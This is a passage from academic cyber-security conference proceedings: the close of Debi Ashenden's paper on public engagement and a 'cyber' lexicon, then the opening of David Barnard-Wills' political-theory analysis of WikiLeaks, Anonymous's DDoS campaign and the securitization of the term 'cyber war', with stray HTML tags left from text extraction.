There is a real need for debate among experts and academic research both to <strong>in</strong>form cyber strategy <strong>in</strong><br />
general but also to provide specific answers to questions such as those around the role of the public.<br />
Research has to cross discipl<strong>in</strong>es and acknowledge that cyberspace is both a physical and a social<br />
construction and has to be considered as such if we are to make progress. The complexities of the<br />
threats and the implications that arise from them have to be explored and discussed. This has to go<br />
hand-<strong>in</strong>-hand with better quality journalism if the public engagement question is to be addressed.<br />
5. Discussion: ‘cyber’ - what’s <strong>in</strong> a name?<br />
If we are to mean<strong>in</strong>gfully engage with the public we will need well-developed messages that use<br />
language with clarity and precision. While too much time can be spent try<strong>in</strong>g to reach def<strong>in</strong>itions that are<br />
widely agreed we do need some differentiation between the terms that we use <strong>in</strong> order to make thoughts<br />
clear and to develop our ideas.<br />
It has been suggested that it is too difficult to categorise different types of cyber attack and that it is<br />
po<strong>in</strong>tless to do so because we have to respond to the attack as it is presented. This may be the case<br />
operationally for those who are manag<strong>in</strong>g the networks and who may not know at the beg<strong>in</strong>n<strong>in</strong>g of an<br />
<strong>in</strong>cident (or, <strong>in</strong>deed, at the end) what type of cyber attack or exploitation they have witnessed.<br />
Conceptually, however, it is very difficult to debate scenarios without at least some del<strong>in</strong>eation.<br />
The dangers of not do<strong>in</strong>g this are twofold. Firstly, it is highly likely that debates will occur with participants<br />
talk<strong>in</strong>g at cross purposes, each believ<strong>in</strong>g that everyone else sees the world of cyber as they do.<br />
Secondly, and more importantly, risk perceptions will become skewed as everyth<strong>in</strong>g from a hack on a<br />
social network<strong>in</strong>g account to onl<strong>in</strong>e credit card fraud is referred to as ‘cyber war’. The risk of each attack<br />
scenario then spirals up and provides the spectre of an attack from a nation state. Conceptually it would<br />
be more useful to disentangle the different elements of each scenario to better understand the risk posed<br />
(for example, onl<strong>in</strong>e credit card fraud may be an opportunistic attack, it may be part of a larger crim<strong>in</strong>al<br />
operation or it may be used to fund terrorism). Without such differentiation debate tends to collapse. A<br />
similar effect occurs through the use of the term ‘attack’ and <strong>in</strong> many cases numbers of attacks are<br />
reported but not the damage caused neither is there usually a def<strong>in</strong>ition of what constitutes an attack.<br />
This leads to the situation where newspaper reports talk of ‘millions of attacks’ (Nye, 2010) leav<strong>in</strong>g the<br />
reader to decide for themselves what this might mean.<br />
Probably the most useful discussion around the need for more precise language for cyber is made by<br />
Myriam Dunn Cavelty (2010). She describes a ‘cyber-escalation ladder’ as a way of help<strong>in</strong>g policy<br />
makers to prioritise. The first three rungs of the ladder are cyber vandalism and ‘hactivism’, cyber crime,<br />
and cyber espionage. The fourth rung is cyber terrorism and the fifth is cyber war. It seems to me that the<br />
first three rungs (with the possible exception of state sponsored cyber espionage) are defended by what<br />
14
Debi Ashenden<br />
we know as <strong>in</strong>formation security (<strong>in</strong> the private sector) or <strong>in</strong>formation assurance (<strong>in</strong> the public sector).<br />
She makes the po<strong>in</strong>t that by categoris<strong>in</strong>g cyber <strong>in</strong> this way it is possible to debate what form different<br />
responses would take. Dunn Cavelty does not def<strong>in</strong>e cyber security but it is logical to take this to<br />
encompass all of the rungs on this ladder as a generic term.<br />
In his recent speech the Director of GCHQ suggested that 80% of cyber security vulnerabilities could be<br />
solved by good <strong>in</strong>formation assurance (and, by implication, <strong>in</strong>formation security) practices. We have<br />
developed approaches to <strong>in</strong>formation assurance and <strong>in</strong>formation security that have been matured over<br />
the last ten years. There is considerable experience across the private and public sector and a grow<strong>in</strong>g<br />
programme of <strong>in</strong>creas<strong>in</strong>gly cross-discipl<strong>in</strong>ary research. It is the other 20% of cyber that we need to turn<br />
our attention to now. This is described as the ‘complex threat’ (Director GCHQ, 2010) and <strong>in</strong>cludes, <strong>in</strong><br />
Dunn Cavelty’s terms, that part of cyber espionage that is state sponsored, cyber terrorism and cyber<br />
war.<br />
If we comb<strong>in</strong>e the cyber escalation ladder with the assertions made by Director GCHQ we end up with<br />
the model below – which may well prove to be a useful way of fram<strong>in</strong>g attempts to engage with the public<br />
and debate issues across academic discipl<strong>in</strong>es.<br />
Cyber<br />
War<br />
CNA* as<br />
strategic & stand<br />
alone<br />
Cyber War<br />
CNA* as<br />
tactical<br />
Cyber Terrorism<br />
Cyber Espionage<br />
Cyber Crime<br />
Cyber Vandalism/Hactivism<br />
20% of the problem<br />
- the ‘complex threat’<br />
80% of the problem<br />
– already be<strong>in</strong>g<br />
addressed<br />
*CNA –<br />
Computer Network Attack<br />
Figure 1: A model for discuss<strong>in</strong>g cyber security<br />
A lexicon for cyber is necessary then, at least at a high level, <strong>in</strong> order to conceptualise the problems and<br />
to support work that crosses academic discipl<strong>in</strong>es. Consistency <strong>in</strong> our use of language is also necessary<br />
if we are to engage the public <strong>in</strong> a mean<strong>in</strong>gful way. A note of caution should be sounded though – such a<br />
lexicon needs to be fit for purpose rather than perfect. In other areas, namely <strong>in</strong>formation assurance and<br />
<strong>in</strong>formation security, we have spent too much time try<strong>in</strong>g to def<strong>in</strong>e terms to the detriment of actually<br />
discuss<strong>in</strong>g the issues.<br />
6. Conclusions<br />
Cyber security is the topic of the moment and is likely to be for at least a few years to come. We have<br />
practiced us<strong>in</strong>g ‘cyber’ <strong>in</strong> various ways and now we need to work out exactly what it means and what the<br />
15
Debi Ashenden<br />
implications are. It is time for engagement with the public and debate among experts. As a first step a<br />
lexicon for the subject would support the development of an <strong>in</strong>tellectual framework that crosses academic<br />
discipl<strong>in</strong>es. The new cyber security <strong>in</strong>stitutions are multi-agency and we need to reflect that academically<br />
by br<strong>in</strong>g<strong>in</strong>g together discipl<strong>in</strong>es such as politics, technology, social science, ethics and law. As we have<br />
seen the public can be both a vulnerability and a threat <strong>in</strong> cyberspace and there are complex issues to be<br />
exam<strong>in</strong>ed. Successful engagement with the public will help us deliver the 80% of cyber security<br />
suggested by the Director of GCHQ while the rema<strong>in</strong><strong>in</strong>g 20% will require a very different type of<br />
engagement that <strong>in</strong>cludes <strong>in</strong>fluence and persuasion activities. Before we can do this though we need to<br />
know what our message is by debat<strong>in</strong>g the issues. As our th<strong>in</strong>k<strong>in</strong>g develops we can start to encourage<br />
better quality journalism that portrays cyber security <strong>in</strong> a serious and thoughtful way and that engages<br />
public th<strong>in</strong>k<strong>in</strong>g, sets the agenda and frames the issues.<br />
References<br />
Bendrath, Ralf (2001), ‘The Cyberwar Debate: Perception and Politics <strong>in</strong> US Critical Infrastructure Protection’<br />
Information & <strong>Security</strong>, Volume 7, pp 80-103<br />
Clarke, Richard A. and Knake, Robert K. (2010) ‘Cyber War’, Harper Coll<strong>in</strong>s<br />
Denn<strong>in</strong>g, Dorothy E. (2003) ‘Information Technology & <strong>Security</strong>’, Naval Postgraduate School, Center of Terrorism<br />
and Irregular Warfare, Monterey, CA<br />
Denn<strong>in</strong>g, Peter J. and Denn<strong>in</strong>g, Dorothy E. (2010) ‘The Profession of IT: Discuss<strong>in</strong>g Cyber Attack’, Communications<br />
of the ACM, Vol 53, No 9, pp 29-31<br />
Director, GCHQ (2010) Speech given at the International Institute of Strategic Studies, UK 13 th October 2010,<br />
[onl<strong>in</strong>e] International Institute of Strategic Studies, http://www.iiss.org/recent-key-addresses/ia<strong>in</strong>-lobbanaddress/<br />
Dunn Cavelty, Myriam, (2010) ‘The Reality and Future of Cyberwar’, Parliamentary Brief, 30 th March 2010 [onl<strong>in</strong>e]<br />
http://www.parliamentarybrief.com/2010/03/the-reality-and-future-of-cyberwar<br />
Farivar, Cyrus, ‘A Brief Exam<strong>in</strong>ation of Media Coverage of Cyberattacks (2007-Present), 2009 Conference<br />
Proceed<strong>in</strong>gs, Conference on Cyberwarfare, 2009, [onl<strong>in</strong>e] http://www.ccdcoe.org/230.html<br />
The Guardian Newspaper, (2010) 28 th August<br />
The Guardian Newspaper, (2011) 28 th January<br />
Michael, James Bret, Tikk, Eneken, Wahlgren, Peter, W<strong>in</strong>field, Thomas, C, (2010) ‘From Chaos to Collective<br />
Defense’, <strong>in</strong> IEEE Computer, 43(12)<br />
National Research Council, (2009) ‘Technology, Policy, Law, and Ethics Regard<strong>in</strong>g US Acquisition and Use of<br />
Cyberattack Capabilities’, Owens, William A, Dam, Kenneth, W, L<strong>in</strong>, Herbert, S, (Editors), National Academies<br />
Press<br />
Nye, Joseph, S. Jr, (2010) ‘Cyber Power’, Harvard, Kennedy School, Belfer Center for Science & International Affairs<br />
[onl<strong>in</strong>e] http://belfercenter.ksg.harvard.edu/files/cyber-power.pdf<br />
16
This is not a Cyber war, its a...? Wikileaks, Anonymous and<br />
the Politics of Hegemony<br />
David Barnard-Wills<br />
Cranfield University, Shrivenham, UK<br />
d.barnardwills@cranfield.ac.uk<br />
Abstract: This paper conducts a political theory analysis us<strong>in</strong>g the conflict, attacks and ‘hactivism’ surround<strong>in</strong>g the<br />
WikiLeaks organisations follow<strong>in</strong>g recent diplomatic cable releases, as a case study to demonstrate the complexity of<br />
contemporary cyber conflict. This complexity is reflected <strong>in</strong> the motivations, identities and values of a multiplicity of<br />
(often non-state) actors. Already termed ‘the first visible cyber war’ this is no simple two-sided conflict (hav<strong>in</strong>g already<br />
drawn <strong>in</strong> states, media organisations, banks and payments companies, and loose coalitions of <strong>in</strong>dividuals) and it is<br />
one which traditional metaphors and analogies of war may occlude as much as they reveal. International Relations<br />
and critical security studies have developed a range of approaches to <strong>in</strong>ternational conflict that focus upon the<br />
identities, values and normative frameworks of participants. These <strong>in</strong>terpretative movements offer a productive way<br />
of understand<strong>in</strong>g cyber conflict, and this paper therefore demonstrates their application. The theory of securitization<br />
is used to demonstrate the politics <strong>in</strong>herent <strong>in</strong> the act of labell<strong>in</strong>g a conflict ‘war’ and how this applies to the cyber<br />
environment. The paper makes use of Antonio Gramsci’s concept of Hegemony, and Ernesto Laclau’s concept of<br />
democratic demands. These models allow us to exam<strong>in</strong>e the contested construction of mean<strong>in</strong>g <strong>in</strong> cyber conflict, a<br />
contestation which applies to the very term<strong>in</strong>ology of the discussion. From this perspective, activities such as<br />
distributed denial of service attacks on Mastercard, Visa etc, can be <strong>in</strong>terpreted as an attempt to establish a<br />
dom<strong>in</strong>ant discursive position and to construct a coalition of sentiment and mean<strong>in</strong>g around a set of political issues –<br />
<strong>in</strong> this case freedom of speech and <strong>in</strong>ternet censorship <strong>in</strong> conflict with state and commercial models of onl<strong>in</strong>e activity.<br />
As a struggle for hegemony rather than a ‘war’ we can understand that hegemony is never total, nor permanent. The<br />
cyber conflict is not ‘won’ but <strong>in</strong>stead someth<strong>in</strong>g that is perpetually worked out.<br />
Keywords: WikiLeaks, cyberwar, cyber conflict, language, <strong>in</strong>ternational relations<br />
1. Introduction<br />
This paper performs a political theory analysis us<strong>in</strong>g the conflict, attacks and hactivism surround<strong>in</strong>g the<br />
recent publication of US diplomatic cables by the WikiLeaks organisation as a case study to demonstrate<br />
the <strong>in</strong>herent complexity of contemporary cyber conflict.<br />
Analyses of Cyberwar threaten to gravitate towards two poles, one aris<strong>in</strong>g from International Relations<br />
security studies and the second from <strong>in</strong>formation security (Nissenbaum 2005). The first of these draws<br />
primarily upon geopolitical analysis, the functions and strategic needs of states <strong>in</strong> an anarchic world<br />
system. A typical example might be Joseph Nye’s ‘Cyber Power’ (Nye 2010). These accounts generally<br />
attempt to <strong>in</strong>corporate ‘cyber’ either as a space of conflict (Barnard-Wills & Ashenden Forthcom<strong>in</strong>g) or a<br />
tool for various actors already active <strong>in</strong> <strong>in</strong>ternational politics. The second performs a technological<br />
analysis of particular network level activity, attempts to locate and assess particular cyber attacks and<br />
determ<strong>in</strong>e effective countermeasures. An example of the second would be Project Grey Goose (Project<br />
Grey Goose 2008). The account of <strong>in</strong>ternational security politics <strong>in</strong> such accounts if often theoretically<br />
and conceptually shallow, and makes simplify<strong>in</strong>g assumptions about the effects of technological<br />
processes on broader social structures.<br />
We present the argument that both of these perspectives lack an understand<strong>in</strong>g of norms, identities and<br />
values that play an important part <strong>in</strong> accounts of cyber conflict and that simply tak<strong>in</strong>g a middle path<br />
between the two poles cont<strong>in</strong>ues this problem. The paper therefore provides an account draw<strong>in</strong>g upon<br />
critical security studies perspectives and a post-structural theory of the formation of group identities.<br />
Critical security studies is a develop<strong>in</strong>g set of perspectives with<strong>in</strong> <strong>in</strong>ternational relations security studies.<br />
Traditional geopolitical perspectives (often termed ‘Realism’ with<strong>in</strong> the discipl<strong>in</strong>e) are based upon certa<strong>in</strong><br />
foundational rules. States are the primary, or even sole, important actor <strong>in</strong> <strong>in</strong>ternational relations. There is<br />
always an enemy, but the identity of this enemy is not particularly important for understand<strong>in</strong>g the<br />
function of the <strong>in</strong>ter-state system. Conflict is the motivat<strong>in</strong>g force <strong>in</strong> <strong>in</strong>ternational affairs, and the model<br />
assumes that states have permanent <strong>in</strong>terests (Coker 2009, p.131). Follow<strong>in</strong>g Cox’s <strong>in</strong>sight that ‘Theory<br />
is always for somebody and for some purpose’ (Cox 1981) security studies can be seen as develop<strong>in</strong>g <strong>in</strong><br />
the west dur<strong>in</strong>g the cold war <strong>in</strong> an attempt to answer the problem of why states go to war, and to study<br />
the threat and use of military force (Peoples & Vaughan-Williams 2009, p.19).<br />
17
David Barnard-Wills<br />
Karen Fierke suggests that due to attempts to develop new approaches and answers, and a rejection of<br />
universal and transitive <strong>in</strong>terests and behaviours among states, critical security studies has arguably<br />
been more <strong>in</strong> l<strong>in</strong>e with a chang<strong>in</strong>g world than its ma<strong>in</strong>stream counterparts (Fierke 2007, p.27). A<br />
sensitivity towards identity and <strong>in</strong>terests is more appropriate than a theory which assumes an unchang<strong>in</strong>g<br />
security environment over time (Fierke 2007, p.28). Furthermore, the Realist perspective concerns itself<br />
with the <strong>in</strong>terests of states and as such is poorly calibrated for understand<strong>in</strong>g the actions of sub-state or<br />
non-state actors (Peoples & Vaughan-Williams 2009, p.20) precisely those that can become <strong>in</strong>volved <strong>in</strong><br />
cyber conflict.<br />
2. The cyberwar?<br />
This section of the paper sets out a brief overview of the events follow<strong>in</strong>g the WikiLeaks ‘Cablegate’<br />
release of US diplomatic cables. This series of events has been selected because it demonstrates a<br />
number of features that have been <strong>in</strong>creas<strong>in</strong>gly associated with contemporary cyber conflict. It has also<br />
been called, somewhat loosely, the first visible cyber war. Because of these features this set of events<br />
provides <strong>in</strong>sight for th<strong>in</strong>k<strong>in</strong>g about cyber conflict more broadly. The conflict has <strong>in</strong>volved non-state actors<br />
and the ‘weapon of choice’ appears to be distributed denial of service attacks. However look<strong>in</strong>g at the<br />
events from a holistic perspective that <strong>in</strong>cludes political, legal and symbolic aspects suggests a more<br />
complicated read<strong>in</strong>g.<br />
In late November 2010 the whistleblow<strong>in</strong>g and journalism organisation WikiLeaks starts to make publicly<br />
available secret cables from United States diplomats. It is rapidly condemned by the US government.<br />
Over the follow<strong>in</strong>g days, quite a range of actors becomes <strong>in</strong>volved <strong>in</strong> this at quite high tempo.<br />
Much of the report<strong>in</strong>g <strong>in</strong> the technical media focused upon the movement between various host<strong>in</strong>g<br />
services and a series of electronic attacks. Shortly after the cable release WikiLeaks’ website comes<br />
under two denial of service attacks, seem<strong>in</strong>gly from a US ‘patriotic hacker’, which force it offl<strong>in</strong>e.<br />
Additionally the Ch<strong>in</strong>ese government blocks access to WikiLeaks from with<strong>in</strong> Ch<strong>in</strong>a. The attacks force<br />
WikiLeaks to move from servers <strong>in</strong> France to two Amazon cloud servers on the 29 th . Amazon then<br />
removes WikiLeaks from its S3 server <strong>in</strong> the US stat<strong>in</strong>g a terms of service violation (Amazon Web<br />
Services 2010). The Berkman Center report on civil society and human rights groups that are the target<br />
of denial of service attacks suggests mak<strong>in</strong>g host<strong>in</strong>g arrangements closer to the ‘core’ of the <strong>in</strong>ternet to<br />
benefit from the capacity and resilience of major service providers, and f<strong>in</strong>d<strong>in</strong>g <strong>in</strong>ternet service providers<br />
who will commit not to remove controversial content unless required to be law (Zukerman et al. 2010,<br />
p.5). This seems to be the motivation for mov<strong>in</strong>g to cloud servers, but was <strong>in</strong> this case <strong>in</strong>effective due to<br />
the unwill<strong>in</strong>gness of such a provider to host. Shortly after everyDNS.net kills the wikileaks.org address,<br />
forc<strong>in</strong>g a move to the Swiss wikileaks.ch. WikiLeaks is now hosted by Swedish company Banhof AB<br />
which excites the media by be<strong>in</strong>g <strong>in</strong>side a bomb shelter.<br />
On the even<strong>in</strong>g of the 3 rd December PayPal stops process<strong>in</strong>g donations to WikiLeaks stat<strong>in</strong>g a violation<br />
of acceptable use and that it considers WikiLeaks to have violated its service agreement on encourag<strong>in</strong>g,<br />
promot<strong>in</strong>g, facilitat<strong>in</strong>g and <strong>in</strong>struct<strong>in</strong>g others <strong>in</strong> illegal activity (PayPal 2010). It is followed on the 7 th by<br />
Mastercard and Visa Europe who also stop process<strong>in</strong>g payments. Visa Europe Ltd blocked donations to<br />
WikiLeaks and Sunsh<strong>in</strong>e Press (the associated fundrais<strong>in</strong>g organisation) from December 8 th pend<strong>in</strong>g an<br />
<strong>in</strong>vestigation <strong>in</strong>to the nature of WikiLeaks bus<strong>in</strong>ess and if it contravened Visas operation conditions. The<br />
<strong>in</strong>ternal <strong>in</strong>vestigation is ongo<strong>in</strong>g, and payments have not been resumed (Associated Press 2011).<br />
Declar<strong>in</strong>g its support for WikiLeaks campaign for transparency and free speech and high critical of those<br />
organisations that had suspended their <strong>in</strong>teractions with the organisation, the <strong>in</strong>ternet collective<br />
‘Anonymous’ redirected its Operation Payback away from the Motion Picture Associate of America<br />
(MPAA) and International Federation of the Phonographic Industry (Zukerman et al. 2010, p.6) towards<br />
the opponents of WikiLeaks. Anonymous has previously also taken action aga<strong>in</strong>st the Church of<br />
Scientology. Anonymous has demonstrated a relatively high level of technical capacity as well as<br />
knowledge of its targets. Us<strong>in</strong>g a distributed denial of services attack (DDoS) us<strong>in</strong>g the ‘Low Orbit Ion<br />
Cannon (LOIC)’ software, Anonymous attacked PayPal on December 6 th and Mastercard on December<br />
8 th .<br />
An Anonymous press release suggested a number of tactics <strong>in</strong> addition to DDoS attacks: a boycott of<br />
Paypal, to spread and mirror the leaked diplomatic cables, form a ‘human DNS’ system to make them<br />
impossible to censor, to upvote Assange on Time’s person of the year list to <strong>in</strong>crease public exposure. It<br />
also advocates post<strong>in</strong>g on ‘critical hubs of <strong>in</strong>formation distribution’ to ‘make sure everyone you know is<br />
18
David Barnard-Wills<br />
aware of what is happen<strong>in</strong>g’. Offl<strong>in</strong>e strategies <strong>in</strong>cluded pr<strong>in</strong>t<strong>in</strong>g out and distribut<strong>in</strong>g locally relevant<br />
cables, compla<strong>in</strong> to local member of parliament or political figures, and conventional protest (marches,<br />
petitions etc). Operations Payback and Avenge Assange <strong>in</strong>terweave onl<strong>in</strong>e strategies and actions <strong>in</strong>to<br />
protest and political action. This is not <strong>in</strong>herently surpris<strong>in</strong>g because the onl<strong>in</strong>e environment is one of the<br />
‘places’ where people enact politics, economics, communicate with peers and get <strong>in</strong>formation. That<br />
political communication and protest activity move here too is to be expected.<br />
The ‘Low Orbit Ion Cannon’ software does not disguise IP addresses and potentially leaves users open to<br />
track<strong>in</strong>g. On the morn<strong>in</strong>g of January 28 th 2011, three teenagers and two adults were arrested <strong>in</strong> the UK<br />
under the Computer Misuse Act 1990 for their alleged <strong>in</strong>volvement <strong>in</strong> Operation Payback (BBC 2011). A<br />
press release from ANON OPS respond<strong>in</strong>g to this <strong>in</strong>terpreted the arrests as a sign that the UK<br />
government does not understand the ‘present-day political and technological reality’ but also as a<br />
declaration of war by the UK government aga<strong>in</strong>st Anonymous. (Anonymous 2010). In co-ord<strong>in</strong>ated<br />
activity, the FBI executed more that forty search warrants across the USA, whilst issu<strong>in</strong>g its own press<br />
release rem<strong>in</strong>d<strong>in</strong>g the public that participat<strong>in</strong>g <strong>in</strong> a DDoS is illegal and punishable with ten years<br />
imprisonment (FBI National Press Office 2011). This should raise some caution towards the assumption<br />
that cyber attacks are generally anonymous.<br />
3. Language and securitization<br />
There are two levels of analysis here – the first is the relatively simply question that asks ‘is the conflict<br />
between Anonymous and service providers, <strong>in</strong> support of WikiLeaks, a cyber war’? The answer to which<br />
is rapidly negative. However, this question reveals a second deeper set of questions about the process of<br />
nam<strong>in</strong>g and def<strong>in</strong><strong>in</strong>g a cyber war; a process that <strong>in</strong>volves language and the politics of securitization.<br />
‘Cyber war’ currently has no objective def<strong>in</strong>ition aga<strong>in</strong>st which we can assess an event or series of events<br />
and make a clear assessment if these events count as cyber war or not. There are a set of usual reasons<br />
why such a def<strong>in</strong>ition is absent. These revolve around antagonistic relations between states unwill<strong>in</strong>g to<br />
settle on a def<strong>in</strong>ition which would either curtail their ability to act <strong>in</strong> this doma<strong>in</strong>, or require them to take<br />
particular action that they wish to avoid. Also, <strong>in</strong> the historical absence of anyth<strong>in</strong>g universally recognised<br />
as a cyber war, comparison is complex.<br />
However the absence of a clear def<strong>in</strong>ition has more substantial epistemological underp<strong>in</strong>n<strong>in</strong>gs. If we<br />
spend some time exam<strong>in</strong><strong>in</strong>g cyberwar’s antecedent concept, that of war itself, we can f<strong>in</strong>d a similar<br />
contested understand<strong>in</strong>g. Fierke (2007, p.34) describes security as an essentially contested concept and<br />
we can extrapolate a similar understand<strong>in</strong>g of war. The criteria for an essentially contested concept is<br />
that a concept must have value associated with it, be <strong>in</strong>ternally complex and part of a broad conceptual<br />
landscape and have relatively open rules of application, so that users can <strong>in</strong>terpret the concept differently<br />
<strong>in</strong> response to different real world events. Typical examples <strong>in</strong> political theory would be ‘justice’ or<br />
‘equality’, mean<strong>in</strong>gful terms around which political ideologies are structured, and which are used to make<br />
political claims.<br />
Political language is not simply descriptive but also evaluative. To term someth<strong>in</strong>g a ‘war’ or not, is not<br />
just to describe, but also to judge (Jackson 2005, p.23). To accept an account of an essentially contested<br />
concept is to also accept political activity <strong>in</strong> l<strong>in</strong>e with that commitment (Fierke 2007, p.34).<br />
Bobbitt argues that the entire system of laws of war is predicated <strong>in</strong> part upon the def<strong>in</strong>ition of warfare<br />
(Bobbitt 2008, p.455). War is a human social artefact (Fierke 2007, p.57), but one that is potentially at<br />
odds with other human ends. The search for def<strong>in</strong>itions and check lists is miss<strong>in</strong>g the contested and<br />
politicised nature of language and the penetration of the def<strong>in</strong>itional exercise by securitization moves.<br />
Labell<strong>in</strong>g a set of events as ‘war’ is a clear example of a securitiz<strong>in</strong>g move. A theoretical concept <strong>in</strong>itially<br />
developed by the Copenhagen school <strong>in</strong> <strong>in</strong>ternational relations, ‘securitization’ does not mean ‘to make<br />
someth<strong>in</strong>g more secure’ but rather to def<strong>in</strong>e someth<strong>in</strong>g as need<strong>in</strong>g to be secured (Buzan et al. 1998,<br />
p.36). Conventionally the referent object of this securitization is the nation state, a political regime or ‘the<br />
people’. The concept of national security assumes that the nation state has to survive and it is therefore<br />
necessary for the state to ma<strong>in</strong>ta<strong>in</strong> armies, produce weapons and seek out <strong>in</strong>telligence (Peoples &<br />
Vaughan-Williams 2009, p.76).<br />
Normal politics is characterised by haggl<strong>in</strong>g and contestation, but multiple actors and agencies with<br />
vary<strong>in</strong>g priorities as well as resources. Successfully securitiz<strong>in</strong>g an issue removes it from this melee and<br />
19
David Barnard-Wills<br />
justifies prioritis<strong>in</strong>g it over other issues (Fierke 2007, p.108). When an issue is successfully presented as<br />
an existential security threat, then it legitimates exceptional political measures (Peoples & Vaughan-<br />
Williams 2009, p.76).<br />
Labell<strong>in</strong>g as war is not simplistic however. There are important questions as to who is labell<strong>in</strong>g. Certa<strong>in</strong><br />
actors will be more effective at labell<strong>in</strong>g issues as security issues than others. This relies upon their<br />
credibility and right to speak to relevant audiences. A securitiz<strong>in</strong>g actor requires enough social and<br />
political capital to conv<strong>in</strong>ce their audience of the existential threat. This authority currently appears to<br />
emerge from the two poles of cyber security, state security actors and computer security actors, with their<br />
own forms of securitization. Certa<strong>in</strong> issues are also easier than others to securitize, given their historical<br />
associations with existential violence (Peoples & Vaughan-Williams 2009, p.79). The Cyber environment<br />
is relatively new <strong>in</strong> this <strong>in</strong> that it really does not have a history of violence, not <strong>in</strong> the same way as massed<br />
tanks on an <strong>in</strong>ternational border. Therefore the use of the term ‘war’ is a bridg<strong>in</strong>g metaphor to more<br />
familiar l<strong>in</strong>guistic descriptions of physical conflict. The concept of ‘<strong>in</strong>formation warfare’ is a similar<br />
securitiz<strong>in</strong>g move, apply<strong>in</strong>g military metaphors to <strong>in</strong>dustry and commerce (Munroe 2005). Nissenbaum<br />
had already highlighted the problems of dom<strong>in</strong>at<strong>in</strong>g Information security through a political frame<br />
(Nissenbaum 2005, p.73) and war can be understood as the paradigmatic form of the political state frame<br />
given the states claim to monopoly on the legitimate use of violence.<br />
A different name for the same set of events may generate both different perceptions of those events,<br />
emotional and affective responses to those events and political and strategic responses to them. Jackson<br />
provides the example of a protest, the description of which as a ‘generally ordered protest’ or an<br />
‘anarchist riot’ would affect the way that police forces respond to future demonstrations (2005, p.23).<br />
Labell<strong>in</strong>g a series of actions and events as cyberwar therefore suggests a particular set of responses.<br />
This is not determ<strong>in</strong>istic, and there is scope for <strong>in</strong>dividual or group agency. However, particular<br />
discourses – ways of mak<strong>in</strong>g sense of the world – and particular categorisations construct particular<br />
responses as rational and others as nonsensical. The labell<strong>in</strong>g of DDoS attacks as a type of war, br<strong>in</strong>gs<br />
with it a historical set of associations, a set of assumptions about the appropriate way to deal with those<br />
problems, and the appropriate agencies for engag<strong>in</strong>g with them. ‘War’ is traditionally the preserve of<br />
military agencies, and responses <strong>in</strong>clude the use of force. Peoples and Vaughn-Williams argue that the<br />
key <strong>in</strong>sight of the securitization model is that security is not always a ‘good th<strong>in</strong>g:<br />
Secuitization of an issue br<strong>in</strong>gs with it a particular type of emergency politics where the<br />
space (and time) allowed for deliberation, participation and barga<strong>in</strong><strong>in</strong>g is necessarily<br />
constricted and br<strong>in</strong>gs <strong>in</strong>to play a particular militarised mode of th<strong>in</strong>k<strong>in</strong>g (Peoples &<br />
Vaughan-Williams 2009, p.83).<br />
For example, treat<strong>in</strong>g the teenagers arrested for participat<strong>in</strong>g <strong>in</strong> LOIC attacks as warfighters would be<br />
hugely problematic.<br />
We can also suggest the prefix ‘cyber’ is also do<strong>in</strong>g some securitiz<strong>in</strong>g work. This prefix is an evocative<br />
placeholder for more prosaic term<strong>in</strong>ology, evok<strong>in</strong>g novel, high-tempo and technological otherworld. For<br />
Coker, war seems to have escaped the narrow parameters it was located with<strong>in</strong> dur<strong>in</strong>g the twentieth<br />
century. Not because of any <strong>in</strong>herent expansion, but because of the extension of ‘security’, the dom<strong>in</strong>ant<br />
‘grammar of violence’ of our age across the variety of social life (Coker 2009, p.62).<br />
Jackson also identifies the importance of language for legitimat<strong>in</strong>g and enact<strong>in</strong>g political violence.<br />
Wars cannot be fought without the will<strong>in</strong>g participation of large numbers of <strong>in</strong>dividuals from<br />
across the social spectrum. Enlist<strong>in</strong>g such support requires alter<strong>in</strong>g the perception of<br />
<strong>in</strong>dividuals to comprehend the need for employ<strong>in</strong>g force, structur<strong>in</strong>g their cognition so it<br />
appears as a reasonable and logical course of action and arous<strong>in</strong>g them emotionally so they<br />
will participate or at least acquiesce to violence (Jackson 2005, pp.23-24)<br />
Talk of cyberwar is part of a rhetorical cha<strong>in</strong> that prepares the ground for ‘violence’ <strong>in</strong> cyberspace and<br />
support for this action. It is precisely this dynamic, through which language constructs perceptions and<br />
affects political attachments to which we now turn driven by critical security studies, this time with the<br />
focus on identity and motivations for Anonymous.<br />
20
David Barnard-Wills<br />
4. Anonymous identities, values and demands<br />
The 2006 US Quadrennial Defense Review argued that traditional <strong>in</strong>ter-state threats were giv<strong>in</strong>g way to<br />
decentralised network threats emerg<strong>in</strong>g from non-state actors, and that the spectrum of irregular conflict<br />
was expand<strong>in</strong>g. Coker argues this perception of threats aris<strong>in</strong>g from unknown and unknowable non-state<br />
actors has penetrated across the way the West th<strong>in</strong>ks about conflict (Coker 2009, p.ix). It is easy to see<br />
how from certa<strong>in</strong> perspectives Anonymous could be seen to fit with<strong>in</strong> this paradigm. Anonymous appears<br />
decentralised, ambiguous, non-state and not motivated by traditional concerns of <strong>in</strong>ternational relations. It<br />
is also harness<strong>in</strong>g modern <strong>in</strong>formation technology for its political activity and to support its decentralised<br />
organisation. It fits with a perception of modern hazards as differ<strong>in</strong>g from the past – they cannot be<br />
conveniently or simply del<strong>in</strong>eated <strong>in</strong> time and space (Coker 2009, p.70).<br />
It also fits with the concern regard<strong>in</strong>g the apparent proliferation of ‘patriotic hackers’. Much attention has<br />
been paid to an apparent develop<strong>in</strong>g trend, <strong>in</strong> which popular cyber campaigns mirror political, economic<br />
or military conflicts <strong>in</strong> cyberspace, primarily conducted by ‘cyber militia’ (Ottis 2010b, p.1). Estonia <strong>in</strong><br />
2007 and Georgia <strong>in</strong> 2008 are seen as the paradigmatic examples of this type of activity, with a focus<br />
upon militia either directed by a state, or self-organis<strong>in</strong>g along l<strong>in</strong>e that parallel state <strong>in</strong>terests. Activity by<br />
these militia is considered problematic because they are often anonymous (small ‘a’) and their<br />
association to a state is hard to ascerta<strong>in</strong>. Compar<strong>in</strong>g such militia to ‘farmers with laptops’ Ottis provides<br />
a break down the of the m<strong>in</strong>imum resources and skills required to conduct an effective cyber campaign,<br />
and f<strong>in</strong>ds very low barriers to action, especially for manual or voluntary botnets for distributed denial of<br />
service attacks (Ottis 2010a). However he does suggests that a requirement for a successful cyber<br />
campaign is that some members must have a deeper understand<strong>in</strong>g of cyber activity.<br />
However not all participants <strong>in</strong> cyber conflict are driven by nationalist afflication, nor by association with<br />
exist<strong>in</strong>g political organisations – even decentralised ones. We can relate this activity to a process of<br />
identity formation associated with a collective horizon of values and perceived <strong>in</strong>terests. The selfproclaimed<br />
<strong>in</strong>tentions and motivations of groups such as Anonymous should be taken seriously <strong>in</strong> any<br />
